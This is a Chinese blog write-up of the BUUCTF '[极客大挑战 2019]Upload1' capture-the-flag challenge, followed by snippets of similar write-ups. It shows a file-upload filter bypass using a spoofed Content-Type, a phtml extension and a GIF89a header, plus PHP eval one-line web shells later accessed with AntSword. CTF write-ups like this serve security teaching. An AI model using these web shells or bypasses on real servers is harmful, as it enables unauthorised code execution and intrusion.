web buuctf [极客大挑战 2019]Upload1

最新推荐文章于 2024-03-03 12:46:02 发布
最新推荐文章于 2024-03-03 12:46:02 发布
阅读量474 收藏
点赞数
文章标签: php html5 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/120096894
版权

1.随便上传一个东西,我上传的是一个txt文档,提示 "not image";

2.不是图片格式,那就抓包改消息头

改为 :

3.上传后提示“don't lie to me,it's not image at all!"

应该是存在过滤,试试其他的格式:

改成php,提示“not php!”

改成php3,提示"not php3!"

之后又试了一下php4,也是不行,

最后试了一下phtml,提示“don't lie to me,it's not image at all!"

这样发现其实如果后缀有过滤就会提示,但是出现其他提示语句,肯定存在别的过滤,我就上网查了一下,是对内容有过滤,需要在内容上前加上GIF89?,我没有一开始就用一句话木马,没有得到更有效的提示:

4.基于题解上,构造payload(复制到文档里就行)

GIF89a?
<script language="php">eval($_POST['shell']);

phpinfo();//我是用来看一句话木马是否传进去了

</script>

提示:

5.需要知道自己的木马下载到了哪个文件夹里,我看了一下上传的路径

http://63341727-b3f0-4e97-a382-adc41764fe47.node4.buuoj.cn:81/upload_file.php

我就直接输入的(想着试试,因为php是upload,没寻思真的就是)

63341727-b3f0-4e97-a382-adc41764fe47.node4.buuoj.cn:81/upload

6.进到上传的文档里a.phtml

 证明木马确实成功上传了

7.用中国蚁剑连接

添加数据

测试连接成功

双击进去

在根目录下有flag文件,双击进入即可获取flag

半杯雨水敬过客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
(文件上传upload) [挑战 2019]Upload1 和 [ACTF2020新生赛]Upload1
一醉一休的博客
02-23 8545
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 一、[挑战 2019]Upload1 ...
BUUCTF---[挑战 2019]Upload1
最新发布
2201_75556700的博客
03-03 526
2.点开链接,需要上传文件,要求是image,上传文件后缀为jpg的一句话木马,发现被检测到了。4.接下来使用bp抓包修改包的后缀为phtml,5.接下来使用蚁剑链接。3.换另一个木马试试。
[挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
BUUCTF——[挑战 2019]Upload 1
weixin_45864041的博客
09-26 1万+
文件上传漏洞,我们先写一句话木马,试着上传。 我们用shell.phtml的文件名直接上传,可以看到有一个前端检查,对文件后缀进行检查。接下来,我们将文件名改成shell.jpg进行上传。 然后又上传失败了,应该是在后端也对我们的文件内容进行了检测。接下来我们试着用文件幻术头的方式进行绕过。 在这里我试了jpg的文件头,但是还是失败了(也不知道为啥) 。最后用gif的文件头成功上传。 说明我们成功绕过了检测然后,我们重新上传,进行抓包,将文件后缀名改成phtml。 上传成功之后,没有给我们具体的存储.
BUUCTF [挑战 2019]Upload
m0_49025459的博客
05-12 4712
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
[挑战 2019]Upload
siu~
09-07 886
[挑战 2019]Upload 解题
Buuctf挑战2019>upload
m0_64444909的博客
04-07 5150
文章目录一.划重点的知识点二.解题步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
BUUCTF——[挑战2019]Upload-1
weixin_62248541的博客
11-25 440
BUUCTF-[挑战2019]Upload-1
文件上传 [挑战 2019]Upload 1
m0_75178803的博客
10-11 780
上传失败了,应该是在后端也对我们的文件内容进行了检测,检测到我们的一句话木马里面包含
web前端
07-22
教程名称:web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?的库之 jQuery UI【】7、常?的库之 jQuery Mobile【】8、常用的库之...
Web3日报 #12
01-08
基于Web3,Solidity,Truffle的一个完整的售卖和购买的简单Dapp demo。 如何在以太坊上构建TodoList – 教程@Riverhttps://www.dappuniversity.com/articles/blockchain-app-tutorial 基于Web3,Solidity,Truffle等...
Web3日报 #6
01-08
如何理解Rust中的可变与不可变? ...@洋芋:本文介绍了Rust标准库中的Cell, RefCell,其作为提供内部可变性的容器,弥补了Rust所有权机制在灵活性上和某些场景下的不足。 学习Polkadot的好地方:Polkadot Wiki ...
Web3日报 #10
01-08
https://learnblockchain.cn/2019/07/27/zengo-tss/ @Shooter:使用ZenGo 钱包不需要备份助记词,交易也不需要输入密码,强调 Keyless 概念,只需要 touchID 或 faceID 授权就可以进行交易。 通过BigQuery服务分析...
[挑战 2019]Upload 1
qq_43618536的博客
07-02 741
BUUCTF的[挑战 2019]Upload 1
BUUCTF】[挑战 2019]Upload1
aoao331198的博客
03-13 922
试着上传一个一句话木马的.jpg文件 <?phpeval($_GET['abc']); ?> 看样子是不能用php,必须换一种语言 仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗 GIF89a图片头文件欺骗 上传成功了,接下来我们在BP中上传,截获数据包,并且把 ...
挑战2019】Upload解题
Bird&Bird
10-26 3499
1、打开BUUCTF在线评测,选择web---->【挑战2019】Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
BUUFCTF—[挑战 2019]Upload 1
yy
05-12 1013
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
buuctf 挑战2019php
08-24
- *2* *3* [【BUUCTF-Web】 [挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值